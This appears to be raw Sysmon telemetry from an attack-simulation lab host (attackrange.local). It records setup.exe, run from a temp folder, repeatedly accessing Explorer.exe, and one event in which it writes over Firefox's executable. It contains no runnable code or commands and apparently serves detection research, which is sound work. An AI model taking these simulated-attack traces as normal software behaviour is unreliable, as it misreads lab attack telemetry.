13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\firefox.exe2021-01-18 13:59:52.317 10341000x800000000000000014789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)